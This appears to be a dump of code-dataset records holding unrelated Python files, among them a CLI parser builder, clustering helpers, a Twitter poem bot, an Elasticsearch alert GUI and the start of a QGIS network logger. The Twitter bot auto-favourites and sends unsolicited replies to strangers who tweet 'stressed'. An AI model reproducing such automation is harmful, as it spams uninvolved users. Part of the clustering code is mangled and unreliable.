lotePrioridadDecreciente(cantTareas, salida, gapTareas, durTareas):\n # cantTareas % 5 == 0\n fOut = open(salida, 'w')\n mod = cantTareas/5\n tiempo = 0\n for i in range(1,6):\n for k in range(1,mod+1):\n fOut.write('@'+str(tiempo)+':\\n')\n fOut.write('TaskPriorizada '+str(i)+' '+str(durTareas*k)+'\\n')\n tiempo += gapTareas\n\ndef lotePrioridadRnd(cantTareas, salida, gapTareas):\n # cantTareas % 5 == 0\n fOut = open(salida, 'w')\n mod = cantTareas/5\n tiempo = 0\n for i in range(5):\n for k in range(1,mod+1):\n fOut.write('@'+str(tiempo)+':\\n')\n fOut.write('TaskPriorizada '+str(random.randint(1, 5))+' '+str(random.randint(1, 10))+'\\n')\n tiempo += gapTareas\n\ndef loteGrande(cantTareas,salida):\n fOut = open(salida, 'w')\n for i in range(cantTareas):\n fOut.write('@0:\\n')\n fOut.write('TaskIO 
'+str(random.randint(1, 8))+' '+str(random.randint(1, 5))+'\\n')\n\ndef loteMisteryNoOrder(cantTareas,salida,gapTareas):\n fOut = open(salida, 'w')\n tiempo = 0\n for i in range(cantTareas):\n fOut.write('@'+str(tiempo)+':\\n')\n fOut.write('TaskCPU '+str(cantTareas-i)+'\\n')\n tiempo += gapTareas\n\ndef loteMisteryInOrder(cantTareas,salida,gapTareas):\n fOut = open(salida, 'w')\n tiempo = 0\n for i in range(cantTareas):\n fOut.write('@'+str(tiempo)+':\\n')\n fOut.write('TaskCPU '+str(i+1)+'\\n')\n tiempo += gapTareas\n\ndef loteControl(cantTareas,salida):\n fOut = open(salida, 'w')\n for i in range(cantTareas):\n fOut.write('@'+str(random.randint(1, cantTareas))+':\\n')\n fOut.write('TaskCPU '+str(random.randint(1, 10))+'\\n')\n\n\n#lotePrioridadDecreciente(10,'LotePrioDec',2,3)\n#lotePrioridadCreciente(10,'LotePrioCre',2,3)\n#lotePrioridadRnd(10,'LotePrioRnd',2)\n#loteGrande(25,'LoteGrande')\n#loteMisteryNoOrder(10,'LoteMysNoOrder',2)\nloteMisteryInOrder(10,'LoteMysInOrder',2)\n#loteControl(10,'LoteControl')\n","sub_path":"Sistemas Operativos/so-tp1-master/loteGen.py","file_name":"loteGen.py","file_ext":"py","file_size_in_byte":2413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"634893778","text":"\"\"\"\nBuilds out an argument parser based on function signatures in various modules.\nEach module is mapped to a sub-command namespace, and each function of that\nmodule is mapped to an operation of that sub command. Parameters to that\nfunction are made into command line arguments. Invocation looks like:\n\n\ncommand sub-command operation REQUIRED_ARG [...] [--OPTIONAL-ARG VAL]\n\"\"\"\nimport argparse\nimport inspect\nimport logging\nimport sys\n\n\ndef _coerce_bool(some_str):\n \"\"\"Stupid little method to try to assist casting command line args to\n booleans\n \"\"\"\n if some_str.lower().strip() in ['n', 'no', 'off', 'f', 'false', '0']:\n return False\n return bool(some_str)\n\n\nclass Newman(object):\n '''Container class to hold a bunch of customized (sub)parsers\n '''\n # TODO: Move this to some kind of optional plugin? Don't want to require\n # Raven for folks who aren't using sentry.\n
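# --- added illustration (editorial comment; module/function names below are hypothetical) ---\n # A module loaded via load_module(backup_tasks, 'backup') that defines\n # def snapshot(target, verify=True): ...\n # would be driven from the shell roughly as:\n # prog backup snapshot /var/data --verify false\n # positional args come from the signature; defaulted args become --flags.\n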
def register_sentry_handler(self, sentry_dns, log_level=logging.ERROR):\n from raven.handlers.logging import SentryHandler\n sentry_handler = SentryHandler(sentry_dns)\n sentry_handler.setLevel(log_level)\n self.logger.addHandler(sentry_handler)\n\n def __init__(self, description=\"A parser nobody bothered to customize\",\n sentry_dns=None, top_level_args=None):\n \"\"\"Build an argument parser from module definitions and run the\n function we were asked for\n\n `top_level_args` should be a dictionary of argument name: default value\n that will be handled by the function that instantiates Newman instead\n of the operation that is ultimately called.\n Use case: global config options/paths\n \"\"\"\n self.logger = logging.getLogger()\n self.parser = argparse.ArgumentParser(\n description=description,\n add_help=True,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter\n )\n\n self.sub_parsers = self.parser.add_subparsers(\n title='task modules',\n description='The following modules were loaded as task namespaces',\n dest='module'\n )\n if sentry_dns:\n self.register_sentry_handler(sentry_dns)\n\n self.default_top_level_args = top_level_args or {}\n for targ, default in self.default_top_level_args.items(): # iterate the defaulted dict; top_level_args itself may be None\n arg_type = type(default)\n if isinstance(default, bool):\n arg_type = _coerce_bool\n self.parser.add_argument('--' + targ.replace('_', '-'),\n type=arg_type, default=default)\n\n self._parsed_args = None\n\n @property\n def func(self):\n if not self._parsed_args:\n self.parse_args()\n return self._parsed_args['func']\n\n @property\n def real_args(self):\n if not self._parsed_args:\n self.parse_args()\n return self._parsed_args['real_args']\n\n @property\n def top_level_args(self):\n if not self._parsed_args:\n self.parse_args()\n return self._parsed_args['top_level_args']\n\n def parse_args(self):\n \"\"\"Generates a dictionary of parsed arguments.\n\n `func` is the operation to be run.\n `top_level_args` is a dict of any arguments that are used in the\n calling process.\n `real_args` are the arguments that the operation will be invoked with.\n \"\"\"\n args = self.parser.parse_args() # oh the possibilities...\n func = args.func # this gets plumbed through by load_module\n real_args = [] # actual positional args we'll be sending to func\n top_level_args = {} # args to be used by caller process, not operation\n\n # yay, even more weird signature hacking. Try to turn the argparse\n # arguments we got (if any) back into regular function arguments\n fargs, varargs, null, fdefaults = inspect.getargspec(func)\n\n for targ in self.default_top_level_args:\n if hasattr(args, targ):\n top_level_args[targ] = getattr(args, targ)\n for farg in fargs:\n if hasattr(args, farg):\n # this function cares about this passed in arg\n real_args.append(getattr(args, farg))\n if varargs:\n # this func takes varargs\n real_args += getattr(args, varargs)\n\n self._parsed_args = {\n 'func': func,\n 'top_level_args': top_level_args,\n 'real_args': real_args\n }\n\n
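# --- added illustration (editorial comment; names are hypothetical) ---\n # For an invocation like: prog --config-path /tmp backup snapshot /var/data\n # with top_level_args={'config_path': '.'}, _parsed_args ends up roughly as\n # {'func': snapshot, 'top_level_args': {'config_path': '/tmp'},\n # 'real_args': ['/var/data']}\n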
def go(self):\n \"\"\"Call this in your CLI entry point once you've loaded all your tasks\n (via load_module()). It will parse any command line args, choose the\n correct function to call, and call it with your arguments, then exit.\n If the arguments specify an unknown command, the usage help will be\n printed and the program will exit with code 1\n \"\"\"\n real_args = self.real_args\n func = self.func\n\n exit_code = 2\n if func:\n try:\n exit_code = func(*real_args)\n except Exception as e:\n self.logger.exception(\"%s (in loaded task)\", e)\n raise\n sys.exit(exit_code)\n\n def load_module(self, module, sub_command):\n \"\"\"Load tasks from the given module, and make them available under the\n given subcommand.\n Build the argument parser for the collected tasks. The sub-parsers get\n attached to the passed in top level parser under the previously\n registered sub-commands.\n\n\n :param module: the module to load tasks from\n :param str sub_command: the command name to associate with this module\n :param top_level: The configured top level command parser\n :type top_level: argparse.ArgumentParser\n \"\"\"\n # Add a sub-parser for this sub-command\n mod_parser = self.sub_parsers.add_parser(\n sub_command,\n description=module.__doc__,\n help=module.__doc__\n )\n mod_sub_parsers = mod_parser.add_subparsers(\n title='tasks under %s' % sub_command,\n help='The following are valid task commands',\n dest='cmd'\n )\n\n for func_name, func_obj in inspect.getmembers(module,\n inspect.isfunction):\n # skip if we are looking at a private function\n if func_name.startswith('_'):\n continue\n # TODO: Not sure what to do about this\n if (not inspect.getmodule(func_obj).__name__.endswith(\n module.__name__)):\n # this check tries to avoid functions at the module level that\n # were imported and not defined in that module\n continue\n # give each function its own sub parser under its parent module\n # and try to provide options based on the function signature\n func_parser = mod_sub_parsers.add_parser(\n func_name,\n help=func_obj.__doc__,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter\n )\n func_parser.set_defaults(func=func_obj)\n\n # get the signature of the method we're setting up\n args, varargs, _, defaults = inspect.getargspec(func_obj)\n if varargs:\n # used if a function accepts *args\n func_parser.add_argument(varargs, nargs='*')\n\n if defaults:\n # defaults arrives as a tuple of argument defaults, but it's\n # indexed from the furthest right argument. So it's possible\n # you may get ['arg1', 'arg2'] as the args and (10,) as the\n # defaults, where 10 is the default value for arg2. Confusing\n # and weird, yes.\n defaults = list(defaults)\n defaults.reverse()\n\n # now for each argument we found, go backwards (see above for why)\n positionals = []\n for cnt, arg in enumerate(reversed(args)):\n if defaults and cnt < len(defaults):\n # we're basically going backwards, but the arg parser\n # doesn't care so this works.
The signature made this\n # optional, so try to make an educated guess as to the type\n # of variable\n kwargs = {\n 'help': 'taken from signature',\n 'default': defaults[cnt],\n }\n if isinstance(defaults[cnt], bool):\n kwargs['type'] = _coerce_bool\n elif defaults[cnt] is None:\n pass\n else:\n kwargs['type'] = type(defaults[cnt])\n func_parser.add_argument(\"--%s\" % arg.replace(\"_\", \"-\"),\n **kwargs)\n else:\n # this is a positional arg, that we know pretty much\n # nothing about\n positionals.append(arg)\n # Finally reverse the positional args again, so they're in the\n # right order\n for arg in reversed(positionals):\n func_parser.add_argument(arg, help='taken from signature')\n","sub_path":"newman/newman.py","file_name":"newman.py","file_ext":"py","file_size_in_byte":9343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"646689339","text":"from rest_framework.response import Response\r\n\r\n\r\nclass APIResponse(Response):\r\n def __init__(self, code=200, msg='成功', status=None, headers=None, **kwargs):\r\n res_data = {\r\n 'code': code,\r\n 'msg': msg,\r\n }\r\n if kwargs:\r\n res_data.update(kwargs)\r\n super().__init__(data=res_data, status=status, headers=headers)\r\n","sub_path":"study_docker_compose/project_api/project_api/utils/ApiResponse.py","file_name":"ApiResponse.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"508151752","text":"import subprocess\nimport time\nimport pandas as pd\nimport numpy as np\nfrom contextlib import redirect_stdout\n\nparse = lambda x: \"\".join(x.split()) # Remove Whitespaces.\n\ndef wam(datapoints,n):\n w = np.empty((n,n))\n for i in range(0,n):\n w[i][i] = 0\n for j in range(i+1, n):\n sum = np.sum((datapoints[i] -datapoints[j])**2)\n w[i][j] = np.exp(-np.sqrt(sum)/2)\n w[j][i] = w[i][j]\n return w\n\ndef ddg(W):\n d = np.sum(W,axis=1)\n d = np.diag(d)\n return d\n\ndef Lnorm(W,D,n):\n for i in range(n):\n D[i][i] = 1/np.sqrt(D[i][i])\n l = np.eye(n)-(D@W@D)\n return l\n\ndef print_matrix(matrix,n):\n for i in range(0,n):\n for j in range(0,n-1):\n num = matrix[i][j]\n if 0>num and -0.00005num and -0.00005 break_time:\r\n\t\treturn True\r\n\telse:\r\n\t\treturn False\r\n\t\t\r\nclass Poem():\r\n def __init__(self,title,text,number):\r\n self.title = title\r\n self.text = text\r\n self.number = number\r\n self.printpoem = ''\r\n self.topline = ''\r\n \r\n def Center_Alignment(self):\r\n x = len(str(self.number)) +2\r\n spaces = ' '*x\r\n self.title = spaces + self.title\r\n Title_Length = len(self.title)\r\n Broken_Text = self.text.split(\"\\\\n\")\r\n Max_Length = len(max(Broken_Text,key=len))\r\n if Title_Length > Max_Length:\r\n Max_Length = Title_Length\r\n Centered_List = []\r\n for line in Broken_Text:\r\n x = int(round((Max_Length-len(line))/2,0))\r\n line = ' '*x + line\r\n Centered_List.append(line)\r\n Centered_Text = ''\r\n for line in Centered_List:\r\n Centered_Text += line + \"\\n\"\r\n #print(Centered_Text)\r\n self.text = Centered_Text\r\n Amount_To_Add_To_Title = round((Max_Length-Title_Length)/2,0)\r\n Spaces = ''\r\n return self\r\n def Print_Poem(self):\r\n x = len(str(self.number))\r\n self.topline = str(self.number) + '- '+ self.title[x+2:]\r\n self.printpoem = self.topline +'\\n\\n\\n'+self.text\r\n return self\r\n \r\ndef Read_The_Lines(txt): #txt = \"BookofCalm.txt\" for example\r\n Poems = []\r\n file = open(txt,\"r\")\r\n page = 1\r\n for line in file:\r\n 
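# --- added note (editorial comment): assumed input format ---\r\n # each line holds one poem as TITLE+TEXT, where \"+\" separates the title\r\n # from the body and a literal two-character backslash-n marker inside the\r\n # body encodes the poem's line breaks (see Center_Alignment's split).\r\n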
Title_Poem_Split = line.split(\"+\")\r\n Poems.append(Poem(Title_Poem_Split[0],Title_Poem_Split[1],page))\r\n page +=1\r\n file.close()\r\n return Poems #list of objects\r\ndef Check_Recents(txt,poemnumber):\r\n\tfile = open(txt,\"r\")\r\n\ttry:\r\n\t\tPoemNumbers = file.readline().split(\" \")\r\n\texcept:\r\n\t\tprint(\"can't read\")\r\n\tif str(poemnumber) in PoemNumbers:\r\n\t\tprint(\"%s is already in recents!!\" % str(poemnumber))\r\n\t\tfile.close()\r\n\t\treturn True\r\n\telif poemnumber not in PoemNumbers:\r\n\t\twhile len(PoemNumbers) >= 50:\r\n\t\t\tprint(\"Removing %s from recents\" % PoemNumbers[0])\r\n\t\t\tdel PoemNumbers[0]\r\n\t\tPoemNumbers.append(poemnumber)\r\n\t\tprint(\"Adding %s to recents\" % (poemnumber))\r\n\t\tfile = open(txt,\"w\")\r\n\t\tfor number in PoemNumbers:\r\n\t\t\tfile.write(str(number)+ \" \")\r\n\t\tfile.close()\r\n\t\treturn False\r\ndef Check_Time(txt):\r\n\tf = open(txt,\"r\")\r\n\ttime = datetime.strptime(f.readline(),'%Y-%m-%d %H:%M:%S.%f')\r\n\tif time == '':\r\n\t\tUpdate_Time(txt)\r\n\t\tCheck_Time(txt)\r\n\t\tf.close()\r\n\tf.close()\r\n\treturn time\r\ndef Update_Time(txt):\r\n\tf = open(txt,\"r\")\r\n\ttime = datetime.strptime(f.readline(),'%Y-%m-%d %H:%M:%S.%f')\r\n\tf = open(txt,\"w+\")\r\n\tf.write(str(datetime.now()))\r\n\tf.close()\r\n\t\r\ndef Check_For_Keywords(Poems,tweet):\r\n\ttweet = tweet.split(\" \")\r\n\tfor poem in Poems:\r\n\t\tintersection = set((poem.text).split(\" \")).intersection(set(tweet))\r\n\t\tif len(intersection) != 0:\r\n\t\t\tprint(\"found keyword(s) %s\" % intersection)\r\n\t\t\treturn poem\r\n\t\telse:\r\n\t\t\treturn random.choice(Poems)\r\n\t\r\ndef Pick_A_Poem(Poems):\r\n Poem_To_Print = random.choice(Poems)\r\n return Poem_To_Print.Center_Alignment().Print_Poem()\r\n\r\ndef Tweet_Poem(Poems,str,keyword_flag):\r\n\tCant_Tweet = True\r\n\tattempt = 0\r\n\twhile Cant_Tweet is True:\r\n\t\tif keyword_flag != \"\" and attempt == 0:\r\n\t\t\tPoem = Check_For_Keywords( Poems, tweet.text)\r\n\t\t\tattempt = 1\r\n\t\telse:\r\n\t\t\tPoem = random.choice(Poems)\r\n\t\tif len(Poem.Center_Alignment().Print_Poem().printpoem) +len(str) > 280:\r\n\t\t\tif len(Poem.Print_Poem().printpoem) +len(str) > 280:\r\n\t\t\t\tCant_Tweet = True\r\n\t\t\telif Check_Recents(\"Recents.txt\",Poem.number) is False:\r\n\t\t\t\treturn Poem.Print_Poem().printpoem\r\n\t\telif Check_Recents(\"Recents.txt\",Poem.number) is False:\r\n\t\t\treturn Poem.Center_Alignment().Print_Poem().printpoem\r\n\t\r\n\t\r\nauth = tweepy.OAuthHandler(\"\",\"\")\r\nauth.set_access_token(\"\",\"\")\r\napi = tweepy.API(auth)\r\ntry:\r\n\tapi.verify_credentials()\r\n\tprint(\"Authentication OK\")\r\n\t\r\nexcept:\r\n\tprint(\"Error during authentication\")\r\n#Start_Time = Time(\"StartTime.txt\")\r\nKeep_Tweeting = True\r\nwhile Keep_Tweeting is True:\r\n\tif Time_Check(60*60*4,Check_Time(\"ActivityTime.txt\")):\r\n\t\tPoems = Read_The_Lines(\"BookofCalm.txt\")\r\n\t\tTweet = Tweet_Poem(Poems,\"\",\"\")\r\n\t\tapi.update_status(Tweet)\r\n\t\tUpdate_Time(\"ActivityTime.txt\")\r\n\t\tprint(\"tweet sent to main\")\r\n\tif Time_Check(60*60*1,Check_Time(\"MentionTime.txt\")):\r\n\t\tfor tweet in api.search(q=\"stressed\",lang=\"en\", count=10):\r\n\t\t\tif tweet.retweeted is False:\r\n\t\t\t\tAlready_Favorite = False\r\n\t\t\t\ttry:\r\n\t\t\t\t\tapi.create_favorite(tweet.id)\r\n\t\t\t\texcept:\r\n\t\t\t\t\tAlready_Favorite = True #This will stop us from sending tweets to same tweet multiple times \r\n\t\t\t\t\tprint(\"can't favourite!\")#if our scanner doesn't produce 
new results\r\n\t\t\t\tif Already_Favorite is False:\r\n\t\t\t\t\tPoems = Read_The_Lines(\"BookofCalm.txt\")\r\n\t\t\t\t\tmention = \"@\"+str(tweet.author.screen_name)\r\n\t\t\t\t\tTweet = Tweet_Poem(Poems,mention,tweet)\r\n\t\t\t\t\tapi.update_status(status = Tweet,in_reply_to_status_id = tweet.id,auto_populate_reply_metadata=True)\r\n\t\t\t\t\tprint(\"tweet sent to %s!\" % tweet.user.name)\r\n\t\t\t\t\tUpdate_Time(\"MentionTime.txt\")\r\n\t\t\t\tsleep(6)\r\n\t\tprint(\"Finished\")\r\n\tsleep(600)\r\n\r\n","sub_path":"BookofCalmScript.py","file_name":"BookofCalmScript.py","file_ext":"py","file_size_in_byte":5656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"435478714","text":"\n\ndef voc_ap(rec, prec, use_07_metric=False):\n '\\n average precision calculations\\n [precision integrated to recall]\\n :param rec: recall\\n :param prec: precision\\n :param use_07_metric: 2007 metric is 11-recall-point based AP\\n :return: average precision\\n '\n if use_07_metric:\n ap = 0.0\n for t in np.arange(0.0, 1.1, 0.1):\n if (np.sum((rec >= t)) == 0):\n p = 0\n else:\n p = np.max(prec[(rec >= t)])\n ap += (p / 11.0)\n else:\n mrec = np.concatenate(([0.0], rec, [1.0]))\n mpre = np.concatenate(([0.0], prec, [0.0]))\n for i in range((mpre.size - 1), 0, (- 1)):\n mpre[(i - 1)] = np.maximum(mpre[(i - 1)], mpre[i])\n i = np.where((mrec[1:] != mrec[:(- 1)]))[0]\n ap = np.sum(((mrec[(i + 1)] - mrec[i]) * mpre[(i + 1)]))\n return ap\n","sub_path":"Data Set/bug-fixing-1/5e9e3d0949cb8051da61ef49339541b5e6f69c03--fix.py","file_name":"5e9e3d0949cb8051da61ef49339541b5e6f69c03--fix.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"126306805","text":"# -*- coding: utf-8 -*-\n# Copyright (c) 2019, stephen and contributors\n# For license information, please see license.txt\n\nfrom __future__ import unicode_literals\nimport frappe\nfrom frappe import _\nfrom frappe.model.document import Document\n\n\nclass VehicleDetails(Document):\n def create_cost_center(self):\n \"\"\"\n\t\tCreate cost center with the name of the property under the selected parent cost center\n\t\t\"\"\"\n if self.vehicle_registration in (None, \"\"):\n frappe.msgprint(_(\"Please set vehicle registration first.\"))\n self.parent_cost_center = \"\"\n return\n from erpnext.setup.doctype.company.company import get_name_with_abbr\n\n real_name = get_name_with_abbr(self.vehicle_registration, self.company)\n # Check if the cost center exists before creating\n if frappe.db.exists(\"Cost Center\", real_name):\n cost_c = frappe.get_doc(\"Cost Center\", real_name)\n if cost_c.parent_cost_center == self.parent_cost_center:\n self.vehicle_cost_center = cost_c.name\n return\n frappe.msgprint(\n _(\n \"A Cost Center with this vehicle exists under another parent. 
You can make changes only in Cost Centers.\"\n )\n )\n self.parent_cost_center = cost_c.parent_cost_center\n return\n\n cost_c = frappe.get_doc(\n {\n \"doctype\": \"Cost Center\",\n \"cost_center_name\": self.vehicle_registration,\n \"parent_cost_center\": self.parent_cost_center,\n \"company\": self.company,\n \"is_group\": 0,\n }\n )\n frappe.db.begin()\n cost_c = cost_c.insert()\n frappe.db.commit()\n self.vehicle_cost_center = cost_c.name\n","sub_path":"vehicle_management/vehicle_management/doctype/vehicle_details/vehicle_details.py","file_name":"vehicle_details.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"24730934","text":"import sys\nimport datetime\nimport winsound\nfrom PyQt5.QtWidgets import *\nfrom PyQt5 import uic\nfrom PyQt5.QtCore import *\nfrom elasticsearch import Elasticsearch\n\n\nclass Alert(QDialog):\n # Alert popup window\n def __init__(self,parent):\n super().__init__()\n uic.loadUi(\"QTui/alert_popup.ui\",self)\n alert_text = \"Location : {} , Detection time : {}\".format(parent.location,parent.timestamp_new)\n self.textBrowser.setPlainText(alert_text)\n winsound.Beep(2000,1000)\n\nclass ESping(QThread):\n # Check ES server status\n def __init__(self,parent):\n super().__init__()\n self.es = Elasticsearch(hosts=parent.ES_SERVER_IP, port=parent.ES_SERVER_PORT)\n\n def run(self):\n self.ES_STATUS = self.es.ping()\n\n\nclass OptionMenu(QDialog):\n # Menu - options dialog\n def __init__(self,parent):\n super().__init__()\n uic.loadUi(\"QTui/alert_option.ui\", self)\n self.setFixedSize(310, 153)\n self.ES_IP = parent.ES_SERVER_IP\n self.ES_PORT = parent.ES_SERVER_PORT\n self.input_ip.setText(parent.ES_SERVER_IP)\n self.input_port.setText(parent.ES_SERVER_PORT)\n self.okbtn.clicked.connect(self.confirm)\n\n def confirm(self):\n self.ES_IP = self.input_ip.text()\n self.ES_PORT = self.input_port.text()\n self.es_id = self.input_id.text()\n self.es_pw = self.input_pw.text()\n self.close()\n\nclass HelpMenu(QDialog):\n # Menu - help dialog\n pass\n\nclass AboutMenu(QDialog):\n # Menu - about dialog\n pass\n\nclass LogTable(QDialog):\n # Log table\n def __init__(self,parent):\n super().__init__(parent)\n uic.loadUi(\"QTui/log_table.ui\",self)\n self.refresh.clicked.connect(self.search_es)\n self.combo_box_options = [\"Unknown\", \"False Positive\", \"Person\"]\n self.index=parent.index\n self.es = parent.es\n self.search_es()\n self.show()\n\n def search_es(self):\n body = {\"query\": {\"match_all\": {}}, \"size\": 10, \"sort\": {\"@timestamp\": \"desc\"}}\n res= self.es.search(index=self.index,body=body)\n count = res['hits']['total']['value']\n if count >= 10:\n count = 10\n timestamp=[]\n location=[]\n objects=[]\n for i in range(count):\n timestamp.append(res['hits']['hits'][i]['_source']['detect_motion'])\n location.append(res['hits']['hits'][i]['_source']['location'])\n objects.append(res['hits']['hits'][i]['_source']['object'])\n\n for index in range(count):\n item1 = QTableWidgetItem(location[index])\n self.tableWidget.setItem(index, 0, item1)\n item2 = QTableWidgetItem(timestamp[index])\n self.tableWidget.setItem(index, 1, item2)\n item3 = QTableWidgetItem(objects[index])\n self.tableWidget.setItem(index, 2, item3)\n combo = QComboBox()\n button = QPushButton(\"Save\")\n for list in self.combo_box_options:\n combo.addItem(list)\n self.tableWidget.setCellWidget(index, 3, combo)\n self.tableWidget.setCellWidget(index, 4, button)\n self.tableWidget.resizeColumnsToContents()\n button.clicked.connect(self.update_es)\n now = datetime.datetime.now().strftime(\"%y-%m-%d %H:%M:%S\")\n self.update_time.setText(\"UPDATE \"+now)\n\n def update_es(self):\n buttonClicked = self.sender()\n index = self.tableWidget.indexAt(buttonClicked.pos())\n value = self.tableWidget.item(index.row(),1).text()\n body = {\"query\": {\"match\": {\"detect_motion\" : value}}}\n result = self.es.search(index=self.index, body=body)\n docID = result['hits']['hits'][0]['_id']\n widget = self.tableWidget.cellWidget(index.row(), 3)\n current_value = widget.currentText()\n self.es.update(index=self.index, id=docID, body={\"doc\":{\"object\" : current_value}})\n self.search_es()\n\n\n\n################### Main class #####################\n\nclass Main(QMainWindow):\n def __init__(self):\n super().__init__()\n uic.loadUi(\"QTui/alert_main.ui\", self)\n self.setFixedSize(314, 218)\n self.timestamp_old = None\n self.timestamp_new = None\n self.es_server_id = None\n self.es_server_pw = None\n self.ES_SERVER_IP = \"127.0.0.1\"\n self.ES_SERVER_PORT = \"9200\"\n self.index =\"cctv\"\n self.status = False\n self.option_es = OptionMenu(self)\n self.alert_enable.triggered.connect(self.Alert_Enable)\n self.alert_disable.triggered.connect(self.Alert_Disable)\n self.menu_es_server.triggered.connect(self.exec_option)\n self.log_table.clicked.connect(self.view)\n self.show()\n\n def refresh(self):\n self.timer = QTimer(self)\n self.timer.start(5000)\n self.timer.timeout.connect(self.search_es)\n\n def exec_option(self):\n self.option_es.exec_()\n\n\n def view(self):\n if self.status:\n LogTable(self)\n else:\n QMessageBox.about(self, \"Info\", \"Please check the ES server status.\")\n\n def Alert_Enable(self):\n self.ES_SERVER_IP = self.option_es.ES_IP\n self.ES_SERVER_PORT = self.option_es.ES_PORT\n self.status_alert_d.setText(\"enable\")\n self.alert_enable.setEnabled(False)\n self.alert_disable.setEnabled(True)\n\n self.es_ping = ESping(self)\n self.es_ping.start()\n self.refresh()\n\n def Alert_Disable(self):\n self.status_alert_d.setText(\"disable\")\n self.status_es_d.setText(\"disable\")\n self.alert_enable.setEnabled(True)\n self.alert_disable.setEnabled(False)\n self.status = False\n self.timer.stop()\n\n def search_es(self):\n self.ES_SERVER_IP = self.option_es.ES_IP\n self.ES_SERVER_PORT = self.option_es.ES_PORT\n self.es_server_id = self.option_es.es_id\n self.es_server_pw = self.option_es.es_pw\n\n try:\n self.ES_STATUS = self.es_ping.ES_STATUS\n except:\n self.status_es_d.setText(\"disable\")\n QMessageBox.about(self,\"ES Server\",\" Connection failed[1] \")\n return self.Alert_Disable()\n\n self.es_ping = ESping(self)\n self.es_ping.start()\n self.es = Elasticsearch(hosts=self.ES_SERVER_IP,port=self.ES_SERVER_PORT,http_auth=(self.es_server_id, self.es_server_pw))\n body = {\"query\": {\"match_all\": {}},\"size\": 1,\"sort\": {\"@timestamp\": \"desc\"}}\n\n try:\n result = self.es.search(index=self.index, body=body)\n self.status_es_d.setText(\"enable\")\n self.location = result['hits']['hits'][0]['_source']['location']\n\n if self.timestamp_old is None:\n self.timestamp_old = result['hits']['hits'][0]['_source']['detect_motion']\n self.timestamp_new = result['hits']['hits'][0]['_source']['detect_motion']\n if self.timestamp_old != self.timestamp_new:\n self.timestamp_old = self.timestamp_new\n alert = Alert(self)\n alert.exec_()\n except:\n self.status_es_d.setText(\"disable\")\n QMessageBox.about(self, \"ES Server\", \" Connection failed[2] \")\n return self.Alert_Disable()\n self.status = True\n\nif __name__ == \"__main__\":\n app=QApplication(sys.argv)\n main=Main()\n
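# --- added note (editorial comment; field values are hypothetical) ---\n # search_es() polls the newest document and expects _source fields like\n # {\"detect_motion\": \"...\", \"location\": \"...\", \"object\": \"...\"};\n # an Alert dialog pops whenever the latest detect_motion value changes.\n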
sys.exit(app.exec_())\n","sub_path":"CCTV/alert.py","file_name":"alert.py","file_ext":"py","file_size_in_byte":7375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"9132172","text":"# -----------------------------------------------------------\n# Copyright (C) 2015 Martin Dobias\n# -----------------------------------------------------------\n# Licensed under the terms of GNU GPL 2\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n# ---------------------------------------------------------------------\n\n# https://doc.qt.io/qt-5/qtwidgets-itemviews-editabletreemodel-example.html#design\n\n\nimport time\n\nfrom qgis.PyQt.QtCore import (\n QAbstractItemModel,\n QSortFilterProxyModel,\n QModelIndex,\n Qt,\n QUrlQuery\n)\nfrom qgis.PyQt.QtWidgets import (\n QApplication,\n QAction\n)\nfrom qgis.PyQt.QtGui import (\n QBrush,\n QFont,\n QColor,\n QDesktopServices\n)\nfrom qgis.PyQt.QtNetwork import (\n QNetworkAccessManager,\n QNetworkRequest,\n QNetworkReply\n)\nfrom qgis.core import (\n QgsNetworkAccessManager,\n QgsNetworkReplyContent,\n QgsNetworkRequestParameters\n)\n\n# get the logger for this QgisNetworkLogger plugin\nimport logging\nfrom . import LOGGER_NAME\nlog = logging.getLogger(LOGGER_NAME)\n\n\"\"\"\nCustom role to be able to keep the Status in the model data\n\"\"\"\nSTATUS_ROLE = Qt.UserRole + 1\n\n\"\"\"\nConstants for the different 'Statuses' a NetworkRequest can be in.\n\"\"\"\nPENDING = 'PENDING'\nCOMPLETE = 'COMPLETE'\nERROR = 'ERROR'\nTIMEOUT = 'TIMEOUT'\nCANCELED = 'CANCELED'\n\n\"\"\"\nConstant for the amount of nodes to keep available, to be able to limit\nthe number of nodes to retain and paint in the Views\n\"\"\"\nNODES2RETAIN = 45 # put in some settings dialog?\n\n\nclass ActivityModel(QAbstractItemModel):\n \"\"\"\n A (QAbstractItem)Model class for all the items from QgsNetworkRequests\n and Responses.\n\n Is responsible for:\n - connecting to current QgsNetworkAccessManager, which creates all\n kind of signals to which we connect to be able to show information\n about it in the Treeview\n\n Upon every network event (like a request to be created, finished etc),\n an ActivityTreeItem (an QAbstractItem) is created to get the data\n needed to be returned upon request of the View which uses this model.\n In our case a QTreeview in a DockWidget\n\n The model when being used looks more or less like this:\n\n RootItem\n |__RequestParentItem (showing id, type (GET etc) url)\n |__RequestItem (holding Request details)\n |__ RequestDetailsItem (key-value pairs with info)\n |__ RequestQueryItems ('Query' holding query info)\n |__ RequestDetailsItem (key-value pairs with info)\n |__ RequestHeadersItem ('Headers')\n |__ RequestDetailsItem (key-value pairs with info)\n |__ PostContentItem (showing Data in case of POST)\n |__ PostDetailsItem (key-value pairs with info)\n |__ReplyItem (holding Reply details)\n |__ ReplyHeadersItem ('Headers')\n |__ ReplyDetailsItem (key-value pairs with info)\n ...\n |__RequestParentItem (showing id, type (GET etc) url)\n ...\n\n \"\"\"\n def __init__(self, parent=None):\n super().__init__(parent)\n self.root_item = RootItem()\n\n self.is_paused = False\n\n # nam = NAM = NetworkAccessManager is a singleton who is responsible\n # for all network requests, use of proxy etc etc\n self.nam = 
